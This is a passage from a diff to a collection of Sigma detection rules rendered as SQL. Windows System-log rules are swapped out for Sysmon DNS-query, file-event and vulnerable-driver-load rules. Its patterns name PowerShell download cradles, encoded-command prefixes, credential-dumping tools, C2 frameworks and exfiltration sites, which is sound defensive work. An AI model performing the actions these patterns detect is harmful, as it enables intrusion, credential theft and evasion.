ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": 
"file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 
'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 
Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 
'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": 
"dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for 
Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": 
"dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - 
"description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - 
"attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' 
AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE 